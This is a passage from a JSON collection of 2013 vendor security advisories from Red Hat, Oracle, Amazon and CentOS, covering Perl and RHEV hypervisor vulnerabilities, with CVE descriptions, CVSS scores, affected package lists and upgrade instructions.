and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:15", "published": "2013-03-26T04:00:00", "id": "RHSA-2013:0685", "href": "https://access.redhat.com/errata/RHSA-2013:0685", "type": "redhat", "title": "(RHSA-2013:0685) Moderate: perl security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1591", "CVE-2013-1667", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-2266"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way KVM handled guest time updates when the buffer\nthe guest registered by writing to the MSR_KVM_SYSTEM_TIME machine state\nregister (MSR) crossed a page boundary. A privileged guest user could use\nthis flaw to crash the host or, potentially, escalate their privileges,\nallowing them to execute arbitrary code at the host kernel level.\n(CVE-2013-1796)\n\nA potential use-after-free flaw was found in the way KVM handled guest time\nupdates when the GPA (guest physical address) the guest registered by\nwriting to the MSR_KVM_SYSTEM_TIME machine state register (MSR) fell into a\nmovable or removable memory region of the hosting user-space process (by\ndefault, QEMU-KVM) on the host. If that memory region is deregistered from\nKVM using KVM_SET_USER_MEMORY_REGION and the allocated virtual memory\nreused, a privileged guest user could potentially use this flaw to escalate\ntheir privileges on the host. (CVE-2013-1797)\n\nA flaw was found in the way KVM emulated IOAPIC (I/O Advanced Programmable\nInterrupt Controller). A missing validation check in the\nioapic_read_indirect() function could allow a privileged guest user to\ncrash the host, or read a substantial portion of host kernel memory.\n(CVE-2013-1798)\n\nAn integer overflow flaw was discovered in one of pixman's manipulation\nroutines. If a remote attacker could trick an application using pixman into\nperforming a certain manipulation, it could cause the application to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2013-1591)\n\nRed Hat would like to thank Andrew Honig of Google for reporting\nCVE-2013-1796, CVE-2013-1797, and CVE-2013-1798.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2013-2266 (a bind issue)\n\nCVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667 (perl\nissues)\n\nThis update contains the fixes from the following errata:\n\novirt-node: RHBA-2013:0745\nlibvirt: RHBA-2013:0725\nvdsm: RHBA-2013:0704\nkernel: RHSA-2013:0744\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:42", "published": "2013-04-23T04:00:00", "id": "RHSA-2013:0746", "href": "https://access.redhat.com/errata/RHSA-2013:0746", "type": "redhat", "title": "(RHSA-2013:0746) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "[4:5.10.1-130]\n- Resolves: #915692 - CVE-2012-5526 (newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers)\n- Resolves: #915692 - CVE-2012-6329 (possible arbitrary code execution via\n Locale::Maketext)\n- Resolves: #915692 - CVE-2013-1667 (DoS in rehashing code)", "edition": 4, "modified": "2013-03-26T00:00:00", "published": "2013-03-26T00:00:00", "id": "ELSA-2013-0685", "href": "http://linux.oracle.com/errata/ELSA-2013-0685.html", "title": "perl security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**Issue Overview:**\n\nA heap overflow flaw was found in Perl. If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2012-5195 __](<https://access.redhat.com/security/cve/CVE-2012-5195>))\n\nA denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption. ([CVE-2013-1667 __](<https://access.redhat.com/security/cve/CVE-2013-1667>))\n\nIt was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items. ([CVE-2012-5526 __](<https://access.redhat.com/security/cve/CVE-2012-5526>))\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates. ([CVE-2012-6329 __](<https://access.redhat.com/security/cve/CVE-2012-6329>))\n\n \n**Affected Packages:** \n\n\nperl\n\n \n**Issue Correction:** \nRun _yum update perl_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perl-suidperl-5.10.1-130.17.amzn1.i686 \n perl-Pod-Escapes-1.04-130.17.amzn1.i686 \n perl-libs-5.10.1-130.17.amzn1.i686 \n perl-version-0.77-130.17.amzn1.i686 \n perl-IO-Compress-Base-2.020-130.17.amzn1.i686 \n perl-Archive-Tar-1.58-130.17.amzn1.i686 \n perl-Test-Harness-3.17-130.17.amzn1.i686 \n perl-Module-Load-0.16-130.17.amzn1.i686 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686 \n perl-Archive-Extract-0.38-130.17.amzn1.i686 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686 \n perl-IPC-Cmd-0.56-130.17.amzn1.i686 \n perl-CGI-3.51-130.17.amzn1.i686 \n perl-Term-UI-0.20-130.17.amzn1.i686 \n perl-5.10.1-130.17.amzn1.i686 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686 \n perl-Package-Constants-0.02-130.17.amzn1.i686 \n perl-Module-Loaded-0.02-130.17.amzn1.i686 \n perl-core-5.10.1-130.17.amzn1.i686 \n perl-Object-Accessor-0.34-130.17.amzn1.i686 \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686 \n perl-devel-5.10.1-130.17.amzn1.i686 \n perl-Module-CoreList-2.18-130.17.amzn1.i686 \n perl-Test-Simple-0.92-130.17.amzn1.i686 \n perl-debuginfo-5.10.1-130.17.amzn1.i686 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686 \n perl-CPANPLUS-0.88-130.17.amzn1.i686 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686 \n perl-IO-Zlib-1.09-130.17.amzn1.i686 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.i686 \n perl-Digest-SHA-5.47-130.17.amzn1.i686 \n perl-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-Params-Check-0.26-130.17.amzn1.i686 \n perl-Time-HiRes-1.9721-130.17.amzn1.i686 \n perl-Module-Build-0.3500-130.17.amzn1.i686 \n perl-Time-Piece-1.15-130.17.amzn1.i686 \n perl-Log-Message-0.02-130.17.amzn1.i686 \n perl-Module-Pluggable-3.90-130.17.amzn1.i686 \n perl-CPAN-1.9402-130.17.amzn1.i686 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686 \n perl-Log-Message-Simple-0.04-130.17.amzn1.i686 \n perl-Pod-Simple-3.13-130.17.amzn1.i686 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.i686 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-parent-0.221-130.17.amzn1.i686 \n perl-File-Fetch-0.26-130.17.amzn1.i686 \n \n src: \n perl-5.10.1-130.17.amzn1.src \n \n x86_64: \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64 \n perl-Archive-Tar-1.58-130.17.amzn1.x86_64 \n perl-CGI-3.51-130.17.amzn1.x86_64 \n perl-devel-5.10.1-130.17.amzn1.x86_64 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64 \n perl-CPAN-1.9402-130.17.amzn1.x86_64 \n perl-Pod-Escapes-1.04-130.17.amzn1.x86_64 \n perl-parent-0.221-130.17.amzn1.x86_64 \n perl-Module-Loaded-0.02-130.17.amzn1.x86_64 \n perl-Module-Pluggable-3.90-130.17.amzn1.x86_64 \n perl-Module-CoreList-2.18-130.17.amzn1.x86_64 \n perl-Archive-Extract-0.38-130.17.amzn1.x86_64 \n perl-IO-Zlib-1.09-130.17.amzn1.x86_64 \n perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64 \n perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64 \n perl-CPANPLUS-0.88-130.17.amzn1.x86_64 \n perl-Test-Simple-0.92-130.17.amzn1.x86_64 \n perl-suidperl-5.10.1-130.17.amzn1.x86_64 \n perl-debuginfo-5.10.1-130.17.amzn1.x86_64 \n perl-Params-Check-0.26-130.17.amzn1.x86_64 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Term-UI-0.20-130.17.amzn1.x86_64 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64 \n perl-Time-HiRes-1.9721-130.17.amzn1.x86_64 \n perl-Digest-SHA-5.47-130.17.amzn1.x86_64 \n perl-Object-Accessor-0.34-130.17.amzn1.x86_64 \n perl-Log-Message-0.02-130.17.amzn1.x86_64 \n perl-Time-Piece-1.15-130.17.amzn1.x86_64 \n perl-Module-Build-0.3500-130.17.amzn1.x86_64 \n perl-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-libs-5.10.1-130.17.amzn1.x86_64 \n perl-version-0.77-130.17.amzn1.x86_64 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-File-Fetch-0.26-130.17.amzn1.x86_64 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64 \n perl-Package-Constants-0.02-130.17.amzn1.x86_64 \n perl-IPC-Cmd-0.56-130.17.amzn1.x86_64 \n perl-core-5.10.1-130.17.amzn1.x86_64 \n perl-Module-Load-0.16-130.17.amzn1.x86_64 \n perl-Test-Harness-3.17-130.17.amzn1.x86_64 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64 \n perl-5.10.1-130.17.amzn1.x86_64 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64 \n perl-Pod-Simple-3.13-130.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-04-04T11:10:00", "published": "2013-04-04T11:10:00", "id": "ALAS-2013-177", "href": "https://alas.aws.amazon.com/ALAS-2013-177.html", "title": "Medium: perl", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-07-17T03:28:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0685\n\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031706.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031707.html\n\n**Affected packages:**\nperl\nperl-Archive-Extract\nperl-Archive-Tar\nperl-CGI\nperl-CPAN\nperl-CPANPLUS\nperl-Compress-Raw-Bzip2\nperl-Compress-Raw-Zlib\nperl-Compress-Zlib\nperl-Digest-SHA\nperl-ExtUtils-CBuilder\nperl-ExtUtils-Embed\nperl-ExtUtils-MakeMaker\nperl-ExtUtils-ParseXS\nperl-File-Fetch\nperl-IO-Compress-Base\nperl-IO-Compress-Bzip2\nperl-IO-Compress-Zlib\nperl-IO-Zlib\nperl-IPC-Cmd\nperl-Locale-Maketext-Simple\nperl-Log-Message\nperl-Log-Message-Simple\nperl-Module-Build\nperl-Module-CoreList\nperl-Module-Load\nperl-Module-Load-Conditional\nperl-Module-Loaded\nperl-Module-Pluggable\nperl-Object-Accessor\nperl-Package-Constants\nperl-Params-Check\nperl-Parse-CPAN-Meta\nperl-Pod-Escapes\nperl-Pod-Simple\nperl-Term-UI\nperl-Test-Harness\nperl-Test-Simple\nperl-Time-HiRes\nperl-Time-Piece\nperl-core\nperl-devel\nperl-libs\nperl-parent\nperl-suidperl\nperl-version\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0685.html", "edition": 5, "modified": "2013-03-26T22:29:30", "published": "2013-03-26T21:05:02", "href": "http://lists.centos.org/pipermail/centos-announce/2013-March/031706.html", "id": "CESA-2013:0685", "title": "perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}